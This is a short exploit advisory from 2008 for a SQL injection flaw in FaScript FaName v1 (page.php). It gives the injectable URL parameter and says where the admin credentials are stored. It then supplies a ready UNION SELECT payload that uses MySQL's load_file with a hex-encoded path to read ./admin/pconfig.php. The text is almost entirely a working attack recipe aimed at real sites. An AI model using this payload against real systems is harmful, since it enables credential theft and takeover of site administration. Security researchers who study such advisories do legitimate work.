FaScript FaName v1 (page.php) Remote SQL Injection Vulnerability :: 2008-01-15
##################################################################################### #### FaScript FaName v1 Remote Sql Injection #### #### BY IRCRASH #### ##################################################################################### # # #AUTHOR : IRCRASH (Dr.Crash) # # # #Script Download : http://www.hotscripts.com/Detailed/66472.html # # # #Injection Adress : http://Sitename/faname/page.php?id=<SqL Code> # # # #Help : In This Script Admin Username and Password Save in ./admin/pconfig.php # # You can open this file with load_file Function in mysql and see admin # # Username and password in Page Source # # # # ./admin/pconfig.php Str2Hex : 0x2e2f61646d696e2f70636f6e6669672e706870 # # # #SQL Code for pconfig.php : 999999'%20union/**/select/**/0,load_file(0x2e2f61646d696e2f70636f6e6669672e706870),2,3/**/from/**/mysql.user/* # # # Our site : HTTP://IRCRASH.COM # # # #####################################################################################Download